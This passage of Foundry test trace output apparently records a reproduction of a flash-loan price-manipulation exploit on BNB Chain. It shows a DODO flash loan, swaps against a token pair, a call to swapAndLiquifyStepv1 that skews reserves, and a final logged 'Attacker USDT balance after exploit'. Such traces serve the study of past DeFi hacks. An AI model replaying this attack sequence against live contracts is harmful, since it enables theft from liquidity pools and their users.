    │   │   │   │   └─ ← [Return] 13207730083446253382868 [1.32e22], 332419158933835275685 [3.324e20], 1669723294 [1.669e9]
    │   │   │   └─ ← [Return] [150000000000000000000000 [1.5e23], 305455891023788359040 [3.054e20]]
    │   │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, 150000000000000000000000 [1.5e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, value: 150000000000000000000000 [1.5e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000a989211282f11bc2c775 → 0x0000000000000000000000000000000000000000000089c59ce6b100aa02c775
    │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x0000000000000000000000000000000000000000000002cbfe1355575e4f6cd4 → 0x00000000000000000000000000000000000000000000228f823f2747d00f6cd4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [115571] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::swap(0, 305455891023788359040 [3.054e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [81122] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 305455891023788359040 [3.054e20])
    │   │   │   │   ├─ emit Transfer(from: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, to: 0x000000000000000000000000000000000000dEaD, value: 3054558910237883590 [3.054e18])
    │   │   │   │   ├─ emit Transfer(from: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, to: 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, value: 6109117820475767180 [6.109e18])
    │   │   │   │   ├─ emit Transfer(from: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, to: 0xAA37693d4f6A29272B94fe7476863bDE5c6e9769, value: 1527279455118941795 [1.527e18])
    │   │   │   │   ├─ emit Transfer(from: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 294764934837955766435 [2.947e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x000000000000000000000000000000000000000000000012053e17d1715edda5 → 0x0000000000000000000000000000000000000000000000017630c54e8209204d
    │   │   │   │   │   @ 0xd5fedca2360db539400fc21e8b39d60b7096fe113acade5c2fecd764158ba725: 0x000000000000000000000000000000000000000000000000049d322b4b31e973 → 0x0000000000000000000000000000000000000000000000005965247597a962ff
    │   │   │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x0000000000000000000000000000000000000000000000084d0075103b201e21 → 0x00000000000000000000000000000000000000000000000877646e35615bdae7
    │   │   │   │   │   @ 0x35b35de2e97ff4134a70d952e490eb3d5cf6f0f31e5dc84b0c991352c71cc19b: 0x000000000000000000000000000000000000000000000000486fe7aea805fb35 → 0x0000000000000000000000000000000000000000000000005da1e4413b23d998
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000ffaaf6a80e984a8a3
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   └─ ← [Return] 163207730083446253382868 [1.632e23]
    │   │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   └─ ← [Return] 26963267910046916685 [2.696e19]
    │   │   │   ├─ emit Sync(reserve0: 163207730083446253382868 [1.632e23], reserve1: 26963267910046916685 [2.696e19])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 150000000000000000000000 [1.5e23], amount1In: 40, amount0Out: 0, amount1Out: 305455891023788359040 [3.054e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x00000000000000000000000000000949078bacd7f93885bb85c3f7d82465719f → 0x0000000000000000000000000000094b332ccbbc2a49764ea0b78fefe17adf77
    │   │   │   │   @ 9: 0x00000000000000000000000000000005b8b05613115dea8fb0ee0f4d440e590b → 0x00000000000000000000000000000005b90a70878811495d6c4879660bdf1f47
    │   │   │   │   @ 8: 0x6385f49e000000000012053e17d1715edda50000000002cbfe1355575e4f6cd4 → 0x6386029a0000000000017630c54e8209204d00000000228f823f2747d00f6cd4
    │   │   │   └─ ← [Stop]
    │   │   ├─ [118822] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::swapAndLiquifyStepv1()
    │   │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6) [staticcall]
    │   │   │   │   └─ ← [Return] 1525554339326077833068 [1.525e21]
    │   │   │   ├─ [108236] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, 1525554339326077833068 [1.525e21], 6441594929497596671 [6.441e18], 0, 0, 0xCdC0B32AB15D1F5ECdC5Aa51d0F9ed98B18a1562, 1669726874 [1.669e9])
    │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x55d398326f99059fF775485246999027B3197955, 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A
    │   │   │   │   ├─ [893] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 163207730083446253382868 [1.632e23], 26963267910046916685 [2.696e19], 1669726874 [1.669e9]
    │   │   │   │   ├─ [13634] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, 1525554339326077833068 [1.525e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, to: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, value: 1525554339326077833068 [1.525e21])
    │   │   │   │   │   ├─ emit Approval(owner: 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 997422830355986137095177 [9.974e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x00000000000000000000000000000000000000000000228f823f2747d00f6cd4 → 0x0000000000000000000000000000000000000000000022e23590ec2a0ea97c40
    │   │   │   │   │   │   @ 0xa247416ee2056e3776b4ccb1d15cecee3d3fdb62435d53627601c69a36d5a3e3: 0x00000000000000000000000000000000000000000000d38919b6b902e9642b75 → 0x00000000000000000000000000000000000000000000d3366664f420aaca1c09
    │   │   │   │   │   │   @ 0xd5fedca2360db539400fc21e8b39d60b7096fe113acade5c2fecd764158ba725: 0x000000000000000000000000000000000000000000000052b351c4e23e9a0f6c → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [26028] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::transferFrom(0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, 252034204149229631 [2.52e17])
    │   │   │   │   │   ├─ [465] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   │   │   │   │   ├─ [397] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::token1() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6
    │   │   │   │   │   ├─ [893] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 163207730083446253382868 [1.632e23], 26963267910046916685 [2.696e19], 1669726874 [1.669e9]
    │   │   │   │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 26963267910046916685 [2.696e19]
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 164733284422772331215936 [1.647e23]
    │   │   │   │   │   ├─ emit Transfer(from: 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, to: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, value: 252034204149229631 [2.52e17])
    │   │   │   │   │   ├─ emit Approval(owner: 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 998945835410818535097586 [9.989e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd5fedca2360db539400fc21e8b39d60b7096fe113acade5c2fecd764158ba725: 0x0000000000000000000000000000000000000000000000005965247597a962ff → 0x00000000000000000000000000000000000000000000000055e5bcaf9e193ac0
    │   │   │   │   │   │   @ 0xa247416ee2056e3776b4ccb1d15cecee3d3fdb62435d53627601c69a36d5a3e3: 0x00000000000000000000000000000000000000000000d388f9d5400b5dc1ad31 → 0x00000000000000000000000000000000000000000000d388f655d845643184f2
    │   │   │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x0000000000000000000000000000000000000000000000017630c54e8209204d → 0x00000000000000000000000000000000000000000000000179b02d147b99488c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [58326] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::mint(0xCdC0B32AB15D1F5ECdC5Aa51d0F9ed98B18a1562)
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 164733284422772331215936 [1.647e23]
    │   │   │   │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 27215302114196146316 [2.721e19]
    │   │   │   │   │   ├─ [354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 738018100495948760 [7.38e17])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xCdC0B32AB15D1F5ECdC5Aa51d0F9ed98B18a1562, value: 18615973487734598921 [1.861e19])
    │   │   │   │   │   ├─ emit Sync(reserve0: 164733284422772331215936 [1.647e23], reserve1: 27215302114196146316 [2.721e19])
    │   │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 1525554339326077833068 [1.525e21], amount1: 252034204149229631 [2.52e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000006bec8c75debc58f19d → 0x00000000000000000000000000000000000000000000006cf923a6ad7eba3a7e
    │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x000000000000000000000000000000000000000000000000252f7295ee33aa8d → 0x0000000000000000000000000000000000000000000000002f6d6a234c124665
    │   │   │   │   │   │   @ 0xf8b30e5b9593b59f4c0ee8620ea14db02a5d365d38bbb627eeb2b8da0802de46: 0x0000000000000000000000000000000000000000000000008c09f06ae22f32eb → 0x0000000000000000000000000000000000000000000000018e6329ac46b1dff4
    │   │   │   │   │   │   @ 11: 0x000000000000000000000000000032664e9f1b1256e3359f6bf80f0c4ddfdaf4 → 0x00000000000000000000000000003377228bcd5a8828dc3803f0221db1e1f300
    │   │   │   │   │   │   @ 8: 0x6386029a0000000000017630c54e8209204d00000000228f823f2747d00f6cd4 → 0x6386029a00000000000179b02d147b99488c0000000022e23590ec2a0ea97c40
    │   │   │   │   │   └─ ← [Return] 18615973487734598921 [1.861e19]
    │   │   │   │   └─ ← [Return] 1525554339326077833068 [1.525e21], 252034204149229631 [2.52e17], 18615973487734598921 [1.861e19]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, 1001)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, value: 1001)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x0000000000000000000000000000000000000000000022e23590ec2a0ea97c40 → 0x0000000000000000000000000000000000000000000022e23590ec2a0ea98029
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000089c59ce6b100aa02c775 → 0x0000000000000000000000000000000000000000000089c59ce6b100aa02c38c
    │   │   │   └─ ← [Return] true
    │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 294764934837955766435 [2.947e20]
    │   │   ├─ [25431] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::transfer(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, 294764934837955766435 [2.947e20])
    │   │   │   ├─ [465] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::token0() [staticcall]
    │   │   │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   │   │   ├─ [397] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::token1() [staticcall]
    │   │   │   │   └─ ← [Return] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6
    │   │   │   ├─ [893] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 164733284422772331215936 [1.647e23], 27215302114196146316 [2.721e19], 1669726874 [1.669e9]
    │   │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   └─ ← [Return] 27215302114196146316 [2.721e19]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   └─ ← [Return] 164733284422772331216937 [1.647e23]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 2947649248379557664 [2.947e18])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, value: 5895298496759115328 [5.895e18])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xAA37693d4f6A29272B94fe7476863bDE5c6e9769, value: 1473824624189778830 [1.473e18])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, value: 284448152468627314190 [2.844e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x35b35de2e97ff4134a70d952e490eb3d5cf6f0f31e5dc84b0c991352c71cc19b: 0x0000000000000000000000000000000000000000000000005da1e4413b23d998 → 0x0000000000000000000000000000000000000000000000007215f7f11d320526
    │   │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x00000000000000000000000000000000000000000000000877646e35615bdae7 → 0x000000000000000000000000000000000000000000000008a04c959525783207
    │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x00000000000000000000000000000000000000000000000179b02d147b99488c → 0x000000000000000000000000000000000000000000000010e53304ade8481e9a
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000ffaaf6a80e984a8a3 → 0x000000000000000000000000000000000000000000000000000009184e72a1a7
    │   │   │   │   @ 0xd5fedca2360db539400fc21e8b39d60b7096fe113acade5c2fecd764158ba725: 0x00000000000000000000000000000000000000000000000055e5bcaf9e193ac0 → 0x000000000000000000000000000000000000000000000000a7b60b6f2651e900
    │   │   │   └─ ← [Return] true
    │   │   ├─ [893] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 164733284422772331215936 [1.647e23], 27215302114196146316 [2.721e19], 1669726874 [1.669e9]
    │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   └─ ← [Return] 311663454582823460506 [3.116e20]
    │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(284448152468627314190 [2.844e20], [0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6, 0x55d398326f99059fF775485246999027B3197955]) [staticcall]
    │   │   │   ├─ [893] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 164733284422772331215936 [1.647e23], 27215302114196146316 [2.721e19], 1669726874 [1.669e9]
    │   │   │   └─ ← [Return] [284448152468627314190 [2.844e20], 150315428016130395876159 [1.503e23]]
    │   │   ├─ [18425] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::swap(150315428016130395876159 [1.503e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 150315428016130395876159 [1.503e23])
    │   │   │   │   ├─ emit Transfer(from: 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 150315428016130395876159 [1.503e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000089c59ce6b100aa02c38c → 0x00000000000000000000000000000000000000000000a99a3a83f0673630eecb
    │   │   │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x0000000000000000000000000000000000000000000022e23590ec2a0ea98029 → 0x00000000000000000000000000000000000000000000030d97f3acc3827b54ea
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   └─ ← [Return] 14417856406641935340778 [1.441e22]
    │   │   │   ├─ [598] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::balanceOf(0x33CCA0E0CFf617a2aef1397113E779E42a06a74A) [staticcall]
    │   │   │   │   └─ ← [Return] 311663454582823460506 [3.116e20]
    │   │   │   ├─ emit Sync(reserve0: 14417856406641935340778 [1.441e22], reserve1: 311663454582823460506 [3.116e20])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 1001, amount1In: 284448152468627314190 [2.844e20], amount0Out: 150315428016130395876159 [1.503e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x6386029a00000000000179b02d147b99488c0000000022e23590ec2a0ea97c40 → 0x6386029a000000000010e53304ade8481e9a00000000030d97f3acc3827b54ea
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A, 794994271783747229185351 [7.949e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A, value: 794994271783747229185351 [7.949e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0 → 0x00000000000000000000000000000000000000000000a858b9cfef253bd9f547
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000a99a3a83f0673630eecb → 0x00000000000000000000000000000000000000000000014180b40141fa56f984
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0xd08a9ae737e46b42cd82616eee75e43319f23a36d87f0f787a6f0d43f5264d30: 0x0000000000000000000000000000000000000000000002cbfe1355575e4f6cd4 → 0x000000000000000000000000000000000000000000000010e53304ade8481e9a
    │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x0000000000000000000000000000000000000000000002530cfdecae871447f8 → 0x000000000000000000000000000000000000000000000246017529e96995444f
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 41478384743744576047 [4.147e19]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 794994271783747229185351 [7.949e23]
    │   ├─ [531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 41478384743744576047 [4.147e19]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 794994271783747229185351 [7.949e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 794994271783747229185351 [7.949e23])
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5930678886576313268612 [5.93e21]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 5930678886576313268612 [5.93e21], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    │   @ 40: 0 → 0x00000000000000000000000000000000000000000000a858b9cfef253bd9f547
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 41.11s (38.62s CPU time)

Ran 2 test suites in 41.15s (42.02s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
